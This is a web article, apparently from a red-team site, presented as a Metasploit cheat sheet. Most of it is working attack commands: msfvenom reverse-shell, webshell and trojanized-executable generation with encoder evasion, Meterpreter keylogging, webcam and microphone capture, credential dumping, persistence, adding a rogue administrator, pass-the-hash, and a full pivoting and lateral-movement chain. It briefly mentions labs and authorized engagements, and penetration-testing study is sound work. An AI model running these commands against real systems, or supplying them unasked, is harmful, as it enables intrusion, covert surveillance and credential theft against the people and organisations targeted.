Metasploit is the exploitation framework everyone knows and half the people actually understand. This cheat sheet covers everything from first-time msfconsole navigation to post-exploitation pivoting — organized by how you actually use it on an engagement, not alphabetically by command.

Updated for 2026. Bookmark it.

Starting Metasploit

# Start msfconsole
msfconsole

# Start with quiet mode (skip banner)
msfconsole -q

# Start with a resource script
msfconsole -r setup.rc

# Start with a specific database
msfconsole -y /path/to/database.yml

# Update Metasploit
msfupdate

Database Setup

Metasploit’s database stores hosts, services, credentials, and loot. Worth setting up.

# Start PostgreSQL
sudo service postgresql start
# or
sudo systemctl start postgresql

# Initialize the database
msfdb init

# Check DB status
msf> db_status

# Connect to existing DB
msf> db_connect postgres:[email protected]/msf

# Disconnect
msf> db_disconnect

# Rebuild the cache
msf> db_rebuild_cache

Core msfconsole Commands

# Help
msf> help
msf> ?

# Search modules
msf> search type:exploit name:eternalblue
msf> search cve:2021-44228
msf> search platform:windows type:exploit rank:excellent
msf> search ms17-010

# Use a module
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use 0    # use by search result number

# Show module info
msf> info
msf> info exploit/windows/smb/ms17_010_eternalblue

# Go back
msf> back

# Previous module
msf> previous

# Show all loaded modules
msf> show exploits
msf> show auxiliary
msf> show post
msf> show payloads
msf> show encoders
msf> show nops
msf> show evasion

Options

# Show options for current module
msf> show options
msf> show advanced    # advanced options
msf> show missing     # required options not yet set

# Set options
msf> set RHOSTS 192.168.1.1
msf> set RPORT 445
msf> set LHOST 192.168.1.100
msf> set LPORT 4444

# Set multiple targets
msf> set RHOSTS 192.168.1.1-254
msf> set RHOSTS 192.168.1.0/24
msf> set RHOSTS file:/tmp/targets.txt

# Unset an option
msf> unset RHOSTS

# Set global options (persist across modules)
msf> setg LHOST 192.168.1.100
msf> setg LPORT 4444

# Unset global option
msf> unsetg LHOST

# Save settings to file
msf> save

Targets and Payloads

# Show compatible targets
msf> show targets
msf> set TARGET 1

# Show compatible payloads for current exploit
msf> show payloads

# Set payload
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf> set PAYLOAD generic/shell_reverse_tcp

# Check if module/target/payload combo is viable
msf> check

Running Modules

# Run/exploit
msf> run
msf> exploit

# Run in background (non-interactive)
msf> run -j
msf> exploit -j

# Run without creating a session
msf> exploit -n

# Run against all RHOSTS in parallel
msf> exploit -j -z

Payloads

Payload Types

TypeDescription
singlesSelf-contained, no stager needed
stagersSmall payload that fetches the stage
stagesThe full payload delivered by a stager
meterpreterAdvanced in-memory shell, extensible
shellBasic command shell

Common Payload Names

# Windows reverse shells
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter_reverse_tcp    # stageless
windows/x64/shell_reverse_tcp
windows/x64/powershell_reverse_tcp

# Windows bind shells
windows/x64/meterpreter/bind_tcp

# Linux reverse shells
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter_reverse_tcp      # stageless
linux/x64/shell_reverse_tcp

# macOS
osx/x64/meterpreter_reverse_tcp
osx/x64/shell_reverse_tcp

# Web payloads
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp

Staged vs Stageless: Staged (reverse_tcp) uses a small first-stage to pull the full payload. Stageless (meterpreter_reverse_tcp) ships everything in one. Use stageless when you can’t make a second outbound connection (locked-down networks). Use staged when file size matters.

msfvenom — Payload Generation

msfvenom generates standalone payloads outside of msfconsole.

Basic Usage

msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <output>

Common Formats

# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll

# PowerShell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o payload.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py

# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# ASP/ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx

# Java WAR
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war

# HTA (HTML Application)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f hta-psh -o payload.hta

# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw > shell.sh

Encoding and Evasion

# List encoders
msfvenom --list encoders

# Encode with shikata_ga_nai (x86 only)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

# Stageless with encoding
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o stageless.exe

# Add NOP sled
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -n 100 -f exe -o payload_nop.exe

# Bad character avoidance
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f exe -o nobadchars.exe

# Inject into existing executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -f exe -o trojanized.exe

# Keep original functionality
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -k -f exe -o trojanized_working.exe

Listing Options

# List all payloads
msfvenom --list payloads

# List payloads for a specific platform
msfvenom --list payloads | grep windows/x64

# List output formats
msfvenom --list formats

# Payload options
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

Listeners — Catching Shells

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
msf> set ExitOnSession false    # keep listening after first session
msf> run -j                      # run as background job

Resource Script for Handler

Save as handler.rc and load with msfconsole -r handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j

Sessions

Managing Sessions

# List active sessions
msf> sessions
msf> sessions -l

# Interact with a session
msf> sessions -i 1

# Kill a session
msf> sessions -k 1
msf> sessions -k all

# Run a command on a session without interacting
msf> sessions -c "whoami" -i 1

# Run a module on a session
msf> sessions -s post/windows/manage/shell_to_meterpreter -i 1

# Upgrade a shell to Meterpreter
msf> sessions -u 1

# Background current session
meterpreter> background
# or
meterpreter> bg

Session Types

# Shell session to Meterpreter
msf> use post/multi/manage/shell_to_meterpreter
msf> set SESSION 1
msf> run

Meterpreter Commands

Core

# Help
meterpreter> help
meterpreter> ?

# Background session
meterpreter> background
meterpreter> bg

# Get current session info
meterpreter> sysinfo

# Current user
meterpreter> getuid

# Get PID
meterpreter> getpid

# Get system info
meterpreter> sysinfo

# Get environment variables
meterpreter> getenv PATH

# Exit/kill session
meterpreter> exit
meterpreter> quit

File System

# Print working directory
meterpreter> pwd

# List directory
meterpreter> ls
meterpreter> dir

# Change directory
meterpreter> cd C:\\Users\\target

# Read file
meterpreter> cat C:\\Users\\target\\Desktop\\secret.txt

# Upload file
meterpreter> upload /local/file.exe C:\\Windows\\Temp\\file.exe

# Download file
meterpreter> download C:\\Users\\target\\Desktop\\secret.txt /local/

# Delete file
meterpreter> rm C:\\Windows\\Temp\\file.exe

# Make directory
meterpreter> mkdir C:\\Windows\\Temp\\working

# Search for files
meterpreter> search -f *.txt -d C:\\Users
meterpreter> search -f password* -d C:\\
meterpreter> search -f *.kdbx

Process Management

# List processes
meterpreter> ps

# Kill process
meterpreter> kill 1234

# Migrate to another process
meterpreter> migrate 1234

# Migrate to explorer.exe (for stability)
meterpreter> migrate -N explorer.exe

# Execute a program
meterpreter> execute -f cmd.exe -i -H    # interactive, hidden
meterpreter> execute -f notepad.exe

# Get shell
meterpreter> shell

Privilege Escalation

# Check privileges
meterpreter> getprivs

# Get system (requires admin)
meterpreter> getsystem

# Show token impersonation options
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"

# UAC bypass (from msfconsole)
msf> use exploit/windows/local/bypassuac
msf> set SESSION 1
msf> run

Networking

# Network interfaces
meterpreter> ipconfig
meterpreter> ifconfig

# ARP table
meterpreter> arp

# Active connections
meterpreter> netstat

# DNS resolve
meterpreter> resolve google.com

# Port forward (local:port → target:host:port)
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.1
meterpreter> portfwd list
meterpreter> portfwd delete -l 3389

# Route through session (add subnet to routing table)
msf> route add 192.168.2.0/24 1    # 1 = session ID
msf> route print
msf> route remove 192.168.2.0/24 1

Credential Dumping

# Dump hashes (requires SYSTEM)
meterpreter> hashdump

# Run Mimikatz (kiwi module)
meterpreter> load kiwi
meterpreter> creds_all              # dump all credentials
meterpreter> lsa_dump_sam           # SAM database
meterpreter> lsa_dump_secrets       # LSA secrets
meterpreter> lsa_dump_cache         # cached domain credentials
meterpreter> kerberos_ticket_list   # list Kerberos tickets
meterpreter> kerberos_ticket_purge
meterpreter> golden_ticket_create   # create golden ticket
meterpreter> wifi_list              # saved WiFi passwords

# Via post module
msf> use post/windows/gather/hashdump
msf> set SESSION 1
msf> run

Screenshots and Keylogging

# Screenshot
meterpreter> screenshot

# Start keylogger
meterpreter> keyscan_start

# Dump keylogger buffer
meterpreter> keyscan_dump

# Stop keylogger
meterpreter> keyscan_stop

# Webcam snapshot
meterpreter> webcam_snap

# Webcam stream
meterpreter> webcam_stream

# Audio capture
meterpreter> record_mic -d 10    # 10 seconds

Persistence

# Registry autorun
msf> use post/windows/manage/persistence
msf> set SESSION 1
msf> set STARTUP REGISTRY
msf> run

# Scheduler task
msf> use post/windows/manage/persistence_exe
msf> set SESSION 1
msf> set STARTUP SCHEDULER
msf> run

# Via meterpreter (older method)
meterpreter> run persistence -h    # see options

Post-Exploitation Modules

Windows

# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION 1
msf> run

# Dump credentials
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump

# Enumerate applications
msf> use post/windows/gather/enum_applications
msf> set SESSION 1
msf> run

# Enumerate logged-on users
msf> use post/windows/gather/enum_logged_on_users

# Collect browser data
msf> use post/windows/gather/enum_chrome
msf> use post/windows/gather/enum_firefox

# Windows Defender status
msf> use post/windows/gather/av_bypass

# Enable RDP
msf> use post/windows/manage/enable_rdp
msf> set SESSION 1
msf> run

# Add admin user
msf> use post/windows/manage/add_user
msf> set SESSION 1
msf> set USERNAME hacker
msf> set PASSWORD Password123
msf> set GROUP Administrators
msf> run

Linux

# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester

# Dump hashes
msf> use post/linux/gather/hashdump
msf> use post/linux/gather/pptpd_chap_secrets

# Enum configs
msf> use post/linux/gather/enum_configs

# SSH key persistence
msf> use post/linux/manage/sshkey_persistence

Cross-Platform

# TCP/UDP scan through session (pivot recon)
msf> use post/multi/gather/ping_sweep
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.2.0/24
msf> set SESSION 1
msf> run

Pivoting

When you’ve compromised a box that can reach networks you can’t directly access.

Route-Based Pivoting

# Add route through session
msf> route add 192.168.2.0/24 1     # session 1
msf> route print

# Now modules targeting 192.168.2.x will pivot through session 1
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run

# Auto-add routes from session
msf> use post/multi/manage/autoroute
msf> set SESSION 1
msf> set ACTION ADD
msf> run

SOCKS Proxy (for external tools)

# Start SOCKS proxy through session
msf> use auxiliary/server/socks_proxy
msf> set VERSION 5
msf> set SRVHOST 127.0.0.1
msf> set SRVPORT 1080
msf> run -j

# Then use proxychains for external tools
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 192.168.2.1
proxychains crackmapexec smb 192.168.2.0/24

Port Forwarding

# Forward local port to remote host:port via session
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.2.10

# Forward local port to remote host:port (reverse)
meterpreter> portfwd add -R -l 4444 -p 4444 -r 192.168.1.100

# Access internal RDP through pivot
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Now: xfreerdp /v:127.0.0.1:3389 /u:administrator

Auxiliary Modules

Scanners, brute forcers, fuzzers — no exploitation, just recon and testing.

Scanning

# Port scan
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.1.0/24
msf> set PORTS 22,80,443,445,3389
msf> run

# SYN scan
msf> use auxiliary/scanner/portscan/syn

# SMB version
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run

# EternalBlue check (no exploitation)
msf> use auxiliary/scanner/smb/smb_ms17_010

# SSH version
msf> use auxiliary/scanner/ssh/ssh_version

# FTP version
msf> use auxiliary/scanner/ftp/ftp_version

# HTTP title
msf> use auxiliary/scanner/http/title

# VNC auth check
msf> use auxiliary/scanner/vnc/vnc_none_auth

Brute Force

# SSH brute force
msf> use auxiliary/scanner/ssh/ssh_login
msf> set RHOSTS 192.168.1.1
msf> set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> set STOP_ON_SUCCESS true
msf> run

# SMB brute force
msf> use auxiliary/scanner/smb/smb_login
msf> set RHOSTS 192.168.1.0/24
msf> set SMBUser administrator
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> run

# FTP brute force
msf> use auxiliary/scanner/ftp/ftp_login

# HTTP form brute force
msf> use auxiliary/scanner/http/http_login

Exploitation

# EternalBlue (MS17-010)
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.1
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run

# BlueKeep (CVE-2019-0708)
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# Log4Shell (CVE-2021-44228)
msf> use exploit/multi/http/log4shell_header_injection

# PrintNightmare (CVE-2021-1675)
msf> use exploit/windows/local/cve_2021_1675_printnightmare

# Zerologon (CVE-2020-1472)
msf> use exploit/windows/dcerpc/cve_2020_1472_zerologon

# MS08-067 (legacy, but lab staple)
msf> use exploit/windows/smb/ms08_067_netapi

Database Commands

# Show discovered hosts
msf> hosts
msf> hosts -R    # set RHOSTS to all discovered hosts

# Show discovered services
msf> services
msf> services -p 445    # filter by port
msf> services -S smb    # filter by service name

# Show credentials
msf> creds

# Show loot
msf> loot

# Import Nmap XML
msf> db_import /path/to/scan.xml

# Run Nmap and import directly
msf> db_nmap -sV -p- 192.168.1.1

# Export database
msf> db_export -f xml /tmp/msf_export.xml

# Workspace management
msf> workspace                  # list workspaces
msf> workspace -a engagement1   # create workspace
msf> workspace engagement1      # switch workspace
msf> workspace -d engagement1   # delete workspace

Resource Scripts

Automate repetitive setup with .rc files.

# Run on start
msfconsole -r /path/to/script.rc

# Run from within msfconsole
msf> resource /path/to/script.rc

# Record commands to a script
msf> spool /tmp/session.rc    # start recording
msf> spool off                 # stop recording

Example auto_handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z

Jobs

# List background jobs
msf> jobs
msf> jobs -l

# Kill a job
msf> jobs -k 0

# Kill all jobs
msf> jobs -K

Useful Combinations

Initial Compromise → Lateral Movement

# 1. Exploit entry point
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit -j

# 2. Add pivot route
msf> route add 192.168.2.0/24 1

# 3. Scan internal network through pivot
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run

# 4. Exploit internal targets through pivot
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.2.20
msf> exploit -j

Quick Domain Compromise (if you have admin hash)

# Pass-the-hash with PSExec
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.1.1
msf> set SMBUser administrator
msf> set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run

Persistence + Cleanup Awareness

# Always document what you plant
meterpreter> run post/windows/manage/persistence SESSION=1

# List persistence items (manual check)
msf> use post/windows/gather/enum_services

# Cleanup before leaving (on authorized engagements)
msf> use post/windows/manage/persistence_exe
msf> set ACTION REMOVE

Quick Reference Card

TaskCommand
Start msfconsolemsfconsole -q
Search modulessearch type:exploit ms17-010
Use moduleuse exploit/windows/smb/ms17_010_eternalblue
Show optionsshow options
Set targetset RHOSTS 192.168.1.1
Set payloadset PAYLOAD windows/x64/meterpreter/reverse_tcp
Run exploitrun or exploit
Background sessionbackground or bg
List sessionssessions -l
Interact with sessionsessions -i 1
Get SYSTEMgetsystem
Dump hasheshashdump (or load kiwi; creds_all)
Upload fileupload /local/file C:\\remote\\path
Download filedownload C:\\remote\\path /local/
Pivot routingroute add 192.168.2.0/24 1
Port forwardportfwd add -l 3389 -p 3389 -r 192.168.2.1
Generate payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o p.exe
Import Nmap scandb_import scan.xml

Metasploit vs. Other Tools

Metasploit doesn’t replace everything — know when to use something else.

TaskMetasploitAlternative
Exploitation✅ Strong module libraryManual exploit code, CrackMapExec
Post-exploitation✅ MeterpreterCobalt Strike, Havoc, Sliver
Payload generation✅ msfvenomSliver, Nimpackt, custom
AV Evasion⚠️ Limited (signatures known)Veil, Shelter, manual obfuscation
C2 / Long-haul ops⚠️ Not built for stealthCobalt Strike, Brute Ratel, Mythic
Network scanning⚠️ Slower than NmapNmap, Masscan, Rustscan
Password attacks✅ Good brute forceHydra, Medusa, Hashcat

For lab work and certification prep, Metasploit is the standard. For real red team ops, it’s a starting point — most serious operators use custom C2s for stealth.

Practice Environment

Metasploit without a target is useless. Get one:

  • TryHackMe — beginner-friendly rooms, many built around Metasploit workflows
  • Hack The Box — more realistic, plenty of MSF-compatible machines in Starting Point
  • Your own lab — spin up a Windows VM or a vulnerable appliance (Metasploitable, DVWA) and fire away

For remote practice without VPN overhead, a $5-6 VPS on Vultr or DigitalOcean gives you a clean attack box with low latency. Spin it up, test, destroy it. No traces on your home IP, no VPN slowdowns.

What’s New in Metasploit 2026

  • Framework 6.4+ ships with improved evasion for Meterpreter HTTPS transport — certificate pinning and JA3 randomization
  • New modules covering cloud-native attack surfaces: AWS metadata service abuse, Azure IMDS exploitation
  • session -u session upgrade is more reliable across Windows 11 + Server 2022 targets
  • load kiwi updated to match Mimikatz 2.2.0 API changes — creds_all more stable on patched domain controllers
  • SOCKS5 proxy module now supports authentication, closing a gap that made pivoting detectable in some environments

Metasploit is the closest thing to a Swiss Army knife in offensive security. It won’t win every engagement alone — but knowing it cold means you move faster when it matters.

This guide is updated regularly. Bookmark it.

RedTeamGuide.com is reader-supported. Some links above are affiliate links — we may earn a commission at no extra cost to you.

Need this kind of content for your company blog, product docs, or security awareness program? CipherWrite delivers expert-level cybersecurity writing on demand.